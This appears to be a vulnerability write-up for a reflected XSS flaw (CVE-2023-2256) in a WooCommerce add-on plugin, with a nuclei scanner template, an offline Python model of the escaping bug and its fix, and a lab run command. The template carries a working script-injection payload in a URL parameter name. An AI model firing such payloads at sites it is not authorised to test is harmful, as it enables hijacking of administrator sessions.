The Product Addons & Fields for WooCommerce WordPress plugin before version 32.0.7 contains a reflected cross-site scripting vulnerability (CVE-2023-2256). The plugin does not properly sanitize and escape some URL parameters on its admin page (wp-admin/admin.php?page=ppom), so an attacker who gets an administrator to open a crafted link can execute arbitrary JavaScript in that administrator's browser context. Note that in the public PoC the payload is carried in a query-parameter name rather than a value, a detail that matters when verifying a fix, and that the scanner template logs in with supplied credentials only so it can observe the reflection on the authenticated page; real exploitation still needs the victim administrator to follow the link (CVSS UI:R).
PoC code (publicly available)
id: CVE-2023-2256

info:
  name: WordPress Product Addons & Fields for WooCommerce < 32.0.7 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The Product Addons & Fields for WooCommerce WordPress plugin before version 32.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape some URL parameters in the admin panel, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context.
  impact: |
    Attackers can inject malicious JavaScript through URL parameters in the admin panel and, once an administrator opens the crafted link, perform actions in that administrator's browser session, potentially gaining full control over the WooCommerce store and customer data.
  remediation: |
    Update Product Addons & Fields for WooCommerce plugin to version 32.0.7 or later, which properly sanitizes and escapes URL parameters in the admin panel.
  reference:
    - https://wpscan.com/vulnerability/1187e041-3be2-4613-8d56-c2394fcc75fb
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2256
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-2256
    cwe-id: CWE-79
    epss-score: 0.06383
    epss-percentile: 0.90754
    cpe: cpe:2.3:a:themeisle:product_addons_\&_fields_for_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 3
    vendor: WordPress
    product: woocommerce-product-addon
    fofa-query: body="wp-content/plugins/woocommerce-product-addon/"
  tags: cve,cve2023,wp,wordpress,wp-plugin,xss,woocommerce,woocommerce-product-addon,authenticated,vuln

http:
  # Request 1: fingerprint the plugin before spending a login on the target.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "woocommerce-product-addon"
          - "woocommerce"
        condition: and
        case-insensitive: true
        internal: true

  # Requests 2 and 3: authenticate (credentials supplied as the nuclei
  # variables username/password), then request the plugin's admin page with
  # the payload in a query-parameter *name* and look for it reflected unescaped.
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=ppom&productmeta_id=5&do_meta=edit&%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100954f3e10e7da2fb1e2058c95eca87143d9c0a2d338f92dca34cf53ee3b5e2e2b0221008429e59a41c22865b7ad6060b1e91f6342a00e4f5eb843a8fdef6c0344823d92:922c64590222798bb761d5b6d8e72950
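The following is an added example, not code from the plugin, the WPScan advisory or the nuclei template above. It models the bug class the advisory describes (a query-string parameter written into admin-page HTML without escaping) and shows why the PoC's payload, which sits in a parameter name rather than a value, is reflected. The rendering functions are hypothetical: the page does not show the plugin's real code, so the "rebuild hidden form fields from the query string" pattern is an assumption used for illustration. The final check is the same test the template's body matcher performs, done offline on the rendered output.

```python
"""Reflected XSS via a query-parameter NAME, modelled offline.

Hypothetical pattern (assumption, not the plugin's actual code): an admin
page copies every incoming query parameter into hidden <input> fields so a
form round-trips them. Three renderers are compared: no escaping, escaping
values only, escaping names and values. Only the last one is safe.
"""
import html
from urllib.parse import parse_qsl, urlsplit

# Request path taken verbatim from the PoC in the nuclei template.
POC_PATH = ("/wp-admin/admin.php?page=ppom&productmeta_id=5&do_meta=edit"
            "&%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1")

# The decoded string the template's body matcher searches for.
PAYLOAD = '"><script>alert(document.domain)</script>'


def query_params(path):
    """Decode the query string into (name, value) pairs as PHP's $_GET would.

    keep_blank_values=True so a bare '&evil' still yields a name to reflect.
    """
    return parse_qsl(urlsplit(path).query, keep_blank_values=True)


def _attr(s):
    """Attribute-context escaping (what esc_attr() does in WordPress)."""
    return html.escape(s, quote=True)


def render_vulnerable(path):
    """Unsafe: names and values land in attributes untouched."""
    return "\n".join(
        f'<input type="hidden" name="{name}" value="{value}">'
        for name, value in query_params(path))


def render_values_only(path):
    """Half a fix: values are escaped but the name is still raw, so the
    PoC (payload in the name) is still reflected."""
    return "\n".join(
        f'<input type="hidden" name="{name}" value="{_attr(value)}">'
        for name, value in query_params(path))


def render_fixed(path):
    """Hardened: every attacker-controlled string is attribute-escaped."""
    return "\n".join(
        f'<input type="hidden" name="{_attr(name)}" value="{_attr(value)}">'
        for name, value in query_params(path))


def reflected_unescaped(body, payload=PAYLOAD):
    """Equivalent of the template's word matcher on the response body: the
    quote and angle brackets must survive verbatim for the XSS to fire."""
    return payload in body


if __name__ == "__main__":
    for label, renderer in (("no escaping", render_vulnerable),
                            ("values only", render_values_only),
                            ("names+values", render_fixed)):
        print(f"{label:13s} reflects payload: {reflected_unescaped(renderer(POC_PATH))}")
```

Running it shows the first two renderers reflecting the payload and the third not, which is the check to repeat against any patched build: request the same URL and confirm the quote and angle brackets come back entity-encoded. To run the nuclei template itself against a lab instance, supply the two credentials as template variables (`nuclei -t CVE-2023-2256.yaml -u https://target -var username=admin -var password=...`); the login only lets the scanner see the authenticated page, it is not part of the attack.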